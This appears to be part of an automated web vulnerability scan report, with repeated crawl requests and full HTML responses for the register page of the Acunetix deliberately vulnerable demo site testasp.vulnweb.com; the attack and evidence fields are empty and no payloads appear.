<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3551 |
